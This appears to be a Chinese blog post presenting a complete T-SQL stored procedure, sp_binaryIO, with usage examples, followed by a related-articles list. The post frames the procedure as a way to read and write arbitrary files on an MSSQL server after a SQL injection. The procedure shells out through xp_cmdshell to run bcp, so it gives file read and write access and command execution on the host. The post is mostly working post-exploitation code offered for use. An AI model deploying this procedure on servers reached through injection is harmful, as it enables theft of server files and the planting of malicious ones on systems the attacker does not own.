注入mssql後使用儲存過程讀寫任意檔案
建立讀寫二進位制檔案的儲存過程,內容如下:
/*--bcp-二進位制檔案的匯入匯出,呼叫示例 :
create table tb (img image);
--資料匯入
exec sp_binaryIO '.', 'sa', '', 'test..tb', 'img', 'c:/abc.jpg', 0
--資料匯出
exec sp_binaryIO '.', 'sa', '', 'test..tb', 'img', 'c:/a.jpg', 1
drop table tb;
--*/
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_binaryIO]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[sp_binaryIO]
GO
Create proc sp_binaryIO
@servename varchar (30), --伺服器名稱
@username varchar (30), --使用者名稱
@password varchar (30), --密碼
@tbname varchar (500), --資料庫..表名
@fdname varchar (30), --欄位名
@fname varchar (1000), --目錄+檔名
@isout bit=1 --1匯出((預設), 0匯入
AS
declare @fname_in varchar(1000), --bcp處理應答檔名
@fsize varchar(20), --要處理的檔案的大小
@m_tbname varchar(50), --臨時表名
@sql varchar(8000)
--取得匯入檔案的大小
if @isout=1
set @fsize = '0'
else
begin
create table #tb(可選名 varchar(20), 大小 int, 建立日期 varchar(10), 建立時間 varchar(20),
上次寫操作日期 varchar(10), 上次寫操作時間 varchar(20), 上次訪問日期 varchar(10),
上次訪問時間 varchar(20), 特性 int)
insert into #tb exec master..xp_getfiledetails @fname
select @fsize = 大小 from #tb
drop table #tb
if @fsize is null
begin
print '檔案未找到'
return
end
end
--生成資料處理應答檔案
set @m_tbname = '[##temp' + cast(newid() as varchar(40)) + ']'
set @sql = 'select * into ' + @m_tbname + ' from (
select null as 型別
union all select 0 as 字首
union all select ' + @fsize + ' as 長度
union all select null as 結束
union all select null as 格式
) a'
exec(@sql)
select @fname_in = @fname + '_temp',
@sql = 'bcp "' + @m_tbname + '" out "' + @fname_in + '" /S"' + @servename
+ case when isnull(@username,'') = '' then '' else '" /U"' + @username end
+ '" /P"' + isnull(@password, '') + '" /c'
exec master..xp_cmdshell @sql
--刪除臨時表
set @sql = 'drop table ' + @m_tbname
exec(@sql)
if @isout=1
begin
-- 匯出
set @sql = 'bcp "select top 1 ' + @fdname + ' from ' + @tbname
+ '" queryout "' + @fname + '" /S"' + @servename
+ case when isnull(@username,'') = '' then '' else '" /U"' + @username end
+ '" /P"' + isnull(@password,'')
+ '" /i"' + @fname_in + '"'
exec master..xp_cmdshell @sql
end
else
begin
-- 匯入
set @sql = 'bcp "'+ @tbname + '" in "' + @fname
+ '" /S"' + @servename
+ case when isnull(@username,'')='' then '' else '" /U"' + @username end
+ '" /P"' + isnull(@password, '') + '" /i"' + @fname_in + '"'
exec master..xp_cmdshell @sql
end
--刪除資料處理應答檔案
set @sql = 'del ' + @fname_in
exec master..xp_cmdshell @sql
go
有了這個儲存過程就可以讀寫任意的檔案了。
相關文章
- php呼叫mssql儲存過程PHPSQL儲存過程
- [MSSQL]mssql海量高效分頁儲存過程SQL儲存過程
- 【草原和大樹】解密MsSql儲存過程解密SQL儲存過程
- mssql 儲存過程呼叫另一個儲存過程中的結果的方法分享SQL儲存過程
- [MSSQL]sql 儲存過程定時執行方法SQL儲存過程
- 使用儲存過程儲存過程
- 編寫JAVA儲存過程Java儲存過程
- Oracle 通過儲存過程來生成CSV檔案Oracle儲存過程
- mssql bcp 工具用法和檢視角色儲存過程SQL儲存過程
- 將圖片檔案儲存到Oracle的儲存過程Oracle儲存過程
- 輸入表名後自動生成sqlldr控制檔案儲存過程SQL儲存過程
- oracle儲存過程書寫格式Oracle儲存過程
- mssql sqlserver 批量刪除所有儲存過程的方法分享SQLServer儲存過程
- 刪除MSSQL危險儲存過程的程式碼(轉)SQL儲存過程
- Mysql 儲存過程的使用MySql儲存過程
- 儲存過程中使用cursor儲存過程
- 在儲存過程中寫truncate table儲存過程
- MySQL儲存過程詳解 mysql 儲存過程MySql儲存過程
- 任意檔案讀取
- 儲存過程儲存過程
- Laravel 中使用 MySQL 儲存過程LaravelMySql儲存過程
- mysql 遊標的使用(儲存過程)MySql儲存過程
- oracle 儲存過程遊標的使用Oracle儲存過程
- MySQL的寫入資料儲存過程MySql儲存過程
- 編寫儲存過程基本注意事項儲存過程
- Python -讀取,儲存檔案Python
- T-SQL 儲存過程建立 PDF 格式檔案(報表)SQL儲存過程
- SQL 儲存過程裡呼叫另一個儲存過程SQL儲存過程
- MySQL儲存過程詳解 mysql 儲存過程linkMySql儲存過程
- Oracle儲存過程乾貨(一):儲存過程基礎Oracle儲存過程
- 用友任意檔案讀取
- 【MSSQL】sqlserver 各種判斷是否存在(表名、函式、儲存過程.......)SQLServer函式儲存過程
- 小寫轉大寫金額儲存過程[SQL SERVER]儲存過程SQLServer
- 儲存過程與儲存函式儲存過程儲存函式
- Oracle儲存過程Oracle儲存過程
- sybase儲存過程儲存過程
- java儲存過程Java儲存過程
- 管理儲存過程儲存過程